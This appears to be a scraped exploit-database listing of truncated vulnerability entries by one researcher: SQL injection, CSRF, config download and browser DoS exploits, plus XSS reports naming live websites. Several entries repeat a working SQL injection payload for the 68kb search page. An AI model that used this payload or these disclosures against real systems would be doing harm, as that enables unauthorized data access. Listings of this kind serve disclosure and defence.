68kb Knowledge Base Script 1.0.0rc2 Search - SQL Injection

No description provided by source. Exploit Title: 68kb SQLI Date: 2010-03-28 Author: Jelmer de Hen Software Link: http://68kb.googlecode.com/files/68kb-v1.0.0rc2.zip Version: v1.0.0rc2 Go to /search and search for: %'//UNION//ALL//SELECT//1,2,user,4,5,6,7,8,9,10,11,12,13,14,15 Don't use spaces in...

Pligg CMS 1.1.3 Multiple Vulnerabilities

Exploit for php platform in category web applications Exploit title: Pligg CMS file existence exploration/shared hosting privilege escalation H.ackAck.net Found by: Jelmer de Hen 15/03/2011 I released some Pligg exploits: http://h.ackack.net/the-pligg-cms-0dayset-1.html 22/03/2011 a patch became...

WordPress Plugin Firestats - Remote Configuration File Download

WordPress Plugin Firestats - Remote Configuration File Download Exploit Title: Wordpress firestats remote configuration file download Date: 2010-07-09 Author: Jelmer de Hen Software Link: http://firestats.cc/ Version: 1.6.5 Tested on: PHP Do a simple GET request to this file:...

Canvas Tag Denial Of Service

"; while 1 echo ""; echo ""; echo ""; ?...

Safari 4.0.5 and Internet Explorer 6.0 / 8.0 Denial of Service

Exploit for windows platform in category dos / poc ============================================================== Safari 4.0.5 and Internet Explorer 6.0 / 8.0 Denial of Service ============================================================== "; while 1 echo ""; echo ""; echo ""; ? 0day.today...

Canvas tag DoS - Multiple Browsers

Exploit for multiple platform in category dos / poc ================================== Canvas tag DoS - Multiple Browsers ================================== "; while 1 echo ""; echo ""; echo ""; ? 0day.today 2018-04-11...

68kb Knowledge Base v1.0.0rc3 edit main settings CSRF

Exploit for php platform in category web applications ===================================================== 68kb Knowledge Base v1.0.0rc3 edit main settings CSRF ===================================================== Exploit Title: 68kb Knowledge Base v1.0.0rc3 edit main settings CSRF Date:...

68KB Knowledge Base Script 1.0.0rc2 - Search SQL Injection

Exploit Title: 68kb SQLI Date: 2010-03-28 Author: Jelmer de Hen Software Link: http://68kb.googlecode.com/files/68kb-v1.0.0rc2.zip Version: v1.0.0rc2 Go to /search and search for: %'//UNION//ALL//SELECT//1,2,user,4,5,6,7,8,9,10,11,12,13,14,15 Don't use spaces in the injection because they change...

68KB Knowledge Base Script 1.0.0rc2 - Search SQL Injection

68KB Knowledge Base Script 1.0.0rc2 - Search SQL Injection Exploit Title: 68kb SQLI Date: 2010-03-28 Author: Jelmer de Hen Software Link: http://68kb.googlecode.com/files/68kb-v1.0.0rc2.zip Version: v1.0.0rc2 Go to /search and search for:...

Unfixed XSS vulnerability at secure.mobilitypass.com

Security researcher Jelmer de Hen, has submitted on 28/08/2009 a cross-site-scripting XSS vulnerability affecting secure.mobilitypass.com, which at the time of submission ranked 729724 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 24/05/2010...

Unfixed XSS vulnerability at exmachina.nl

Security researcher Jelmer, has submitted on 16/03/2009 a cross-site-scripting XSS vulnerability affecting exmachina.nl, which at the time of submission ranked 3500054 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 12/07/2009. It is currently...

Fixed XSS vulnerability at www.basstdance.nl

Security researcher jelmer, has submitted on 28/01/2009 a cross-site-scripting XSS vulnerability affecting www.basstdance.nl, which at the time of submission ranked 0 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 24/05/2009. It is currently...

Terrible: Windows Media Player

Wednesday, August 21, 2002 Dear Mister, 'silent delivery and installation of an executable on the target computer, no client input other than viewing a web page' default installation of Internet Explorer and Windows Media Player. This is truly terrible. In addition to server side '404 errors',...